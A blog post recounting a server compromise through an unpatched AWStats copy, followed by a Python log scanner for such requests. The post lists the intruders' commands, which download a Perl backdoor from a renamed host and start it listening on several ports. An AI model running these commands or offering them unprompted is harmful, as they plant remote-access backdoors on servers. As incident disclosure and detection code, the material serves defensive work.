I’m not sure how bad the damage is yet. They got in yesterday through an installation of AWStats that hadn’t been upgraded. We upgraded our main installation, but there was another copy that they found. We’re in pretty good company though: Russell Beattie and Jeremy Zawodny got hit with the same thing.
They jumped around IPs using proxy servers, and it looks like we were scanned a few times before someone decided to exploit it. The scanner attempts to run the ‘id’ command, and if it gets output it figures it has found a vulnerable server.
Once inside they created a directory in /tmp called ‘.,’ and put some privilege escalation exploits in there. Not sure what happened after that, their shell’s history file was /dev/null.
The only reason a couple of other people and I noticed was that the server was super slow. I guess if script kiddies’ backdoors were better written, they’d probably be good enough coders to do something worthwhile with their adolescence.
Luckily we found it before they deleted anything, but we’re still checking stuff out and making sure we’ve eradicated them from the system. That’s pretty much all we can do in the short term, although an OS reload looks like it’s in our future.
For those who are interested, I’ve put the commands they ran through AWStats in the full entry. Condolences gladly accepted; admonishments for not finding and upgrading all copies of a vulnerable program are not necessary.
Here’s what they did:
uname 0a # Note the typo, so it wasn't automated
bd.pl is basically a poorly written telnet server that takes the port as the argument
cd /tmp;wget example.net/bd/bd.pl # changed to protect what I assume is another hacked site
cd /tmp;perl bd.pl 123456
cd /tmp;perl bd.pl 12345
cd /tmp;perl bd.pl 1235
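As an added example that is not part of the original post: a small Python log scanner that flags requests to awstats.pl whose query string decodes to shell metacharacters or the commands listed above, and separates the scanner's lone 'id' probe from follow-on wget/perl activity. The access-log lines, the IP addresses and the query parameter name 'x' are constructed for illustration, not taken from the incident.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access-log sample (not real data from the incident).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2005:03:12:07 +0000] "GET /cgi-bin/awstats.pl?config=site HTTP/1.1" 200 5120
203.0.113.5 - - [10/Jan/2005:03:12:09 +0000] "GET /cgi-bin/awstats.pl?x=id HTTP/1.1" 200 310
198.51.100.7 - - [11/Jan/2005:14:40:01 +0000] "GET /cgi-bin/awstats.pl?x=cd%20/tmp;wget%20example.net/bd/bd.pl HTTP/1.1" 200 412
198.51.100.7 - - [11/Jan/2005:14:40:05 +0000] "GET /cgi-bin/awstats.pl?x=cd%20/tmp;perl%20bd.pl%2012345 HTTP/1.1" 200 98
192.0.2.9 - - [11/Jan/2005:15:00:00 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

# Common log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
# Shell metacharacters plus the commands the post describes (id, uname, wget, perl, cd).
META_RE = re.compile(r'[;|`$]')
CMD_RE = re.compile(r'(?<![\w/])(id|uname|wget|perl|cd)\b')

def classify(line):
    """Return a hit dict for a suspicious awstats.pl request, else None."""
    m = LOG_RE.match(line)
    if not m or 'awstats.pl' not in m['url']:
        return None
    decoded = unquote_plus(m['url'].partition('?')[2])   # query string, URL-decoded
    meta = bool(META_RE.search(decoded))
    cmds = sorted(set(CMD_RE.findall(decoded)))
    if not meta and not cmds:
        return None
    # A bare 'id' is the scanner's probe; wget/perl/cd is someone acting on the result.
    kind = 'probe' if cmds == ['id'] else 'exploit' if cmds else 'suspicious'
    return {'ip': m['ip'], 'ts': m['ts'], 'kind': kind, 'commands': cmds, 'query': decoded}

def scan(log_text):
    return [r for r in (classify(l) for l in log_text.splitlines()) if r]

def by_source(results):
    """Group hit kinds per client IP to see scanning and exploitation come from different proxies."""
    out = {}
    for r in results:
        out.setdefault(r['ip'], []).append(r['kind'])
    return out

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit['ts'], hit['ip'], hit['kind'], hit['commands'])
```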